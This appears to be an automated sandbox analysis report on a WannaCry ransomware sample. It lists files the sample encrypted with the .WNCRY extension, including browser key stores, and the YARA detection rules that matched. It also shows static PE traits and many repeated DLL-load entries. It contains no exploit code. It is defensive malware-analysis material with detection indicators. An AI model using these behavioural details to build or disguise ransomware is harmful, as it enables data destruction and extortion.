              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\x9TiBFKPhYF4yOf0IfKaPIf64qI.br[1].js.WNCRY (copy) entropy: 7.99845396163Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\xO01H2dEYfjtj69ouv_nR5Al0cU.br[1].js.WNCRY (copy) entropy: 7.99900370304Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\0PV09LN5\15\ZNvOyS-r2rT3Al22ByUYXLQ5kPY.br[1].js.WNCRY (copy) entropy: 7.99812024708Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\7TU8ICAJ\WwF5sNrjseqq673SafWJ8p6dARY[1].js.WNCRY (copy) entropy: 7.9967761313Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\QTRC1JK9\X6j0qPgNij1n_IogMJrgYaT9Kp8[1].js.WNCRY (copy) entropy: 7.99088728114Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg.WNCRY (copy) entropy: 7.99819743435Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-LIGHT.svg.WNCRY (copy) entropy: 7.99840971864Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cert9.db.WNCRY (copy) entropy: 7.99917326831Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\key4.db.WNCRY (copy) entropy: 7.99936547955Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\Downloads\Ransomware.WannaCry.zip.WNCRY (copy) entropy: 7.99995016523Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Temp\52.WNCRYT (copy) entropy: 7.99923285382Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeFile created: C:\Users\user\AppData\Local\Temp\417.WNCRYT (copy) entropy: 7.99994045716Jump to dropped file
              Source: conhost.exeProcess created: 84
              Source: cmd.exeProcess created: 56

              System Summary

              barindex
              Source: 69.0.@WanaDecryptor@.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 11.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
              Source: 11.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: 11.0.ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: 0000000B.00000000.1406207775.000000000040E000.00000008.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\r.wnry, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\u.wnry, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\58191711205328.bat, type: DROPPEDMatched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exe, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, type: DROPPEDMatched rule: Detects WannaCry Ransomware Note Author: Florian Roth
              Source: C:\Users\user\Downloads\Ransomware.WannaCry.zipFile download: blob:https://github.com/fe9fd1bb-81b0-46e8-b5ff-9fe7071e9e1f
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile dump: C:\Users\user\Downloads\Ransomware.WannaCry.zip (copy)Jump to dropped file
              Source: 96480cbf-b01d-460f-82e8-4fca4d4fafcb.tmp.0.drZip Entry: encrypted
              Source: chromecache_739.1.drZip Entry: encrypted
              Source: chromecache_753.1.drZip Entry: encrypted
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeProcess Stats: CPU usage > 24%
              Source: taskdl.exe.11.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
              Source: libssp-0.dll.69.drStatic PE information: Number of sections : 17 > 10
              Source: libevent-2-0-5.dll.69.drStatic PE information: Number of sections : 17 > 10
              Source: libgcc_s_sjlj-1.dll.69.drStatic PE information: Number of sections : 17 > 10
              Source: ssleay32.dll.69.drStatic PE information: Number of sections : 18 > 10
              Source: libevent_extra-2-0-5.dll.69.drStatic PE information: Number of sections : 17 > 10
              Source: libevent_core-2-0-5.dll.69.drStatic PE information: Number of sections : 17 > 10
              Source: libeay32.dll.69.drStatic PE information: Number of sections : 18 > 10
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeSection loaded: msvcp60.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sxs.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: vbscript.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrobj.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: mpr.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: scrrun.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: propsys.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: linkinfo.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: ntshrui.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: cscapi.dll
              Source: C:\Windows\SysWOW64\cscript.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: thumbcache.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: photometadatahandler.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: apphelp.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: mfsrcsnk.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: mfplat.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: rtworkq.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: thumbcache.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: thumbcache.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: thumbcache.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: thumbcache.dll
              Source: C:\Windows\System32\dllhost.exeSection loaded: thumbcache.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: riched32.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: riched20.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: usp10.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msls31.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: riched32.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: riched20.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: usp10.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msls31.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: textinputframework.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: coreuicomponents.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: mfc42.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msvcp60.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: riched32.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: riched20.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: usp10.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: msls31.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@WanaDecryptor@.exeSection loaded: kernel.appcore.dll
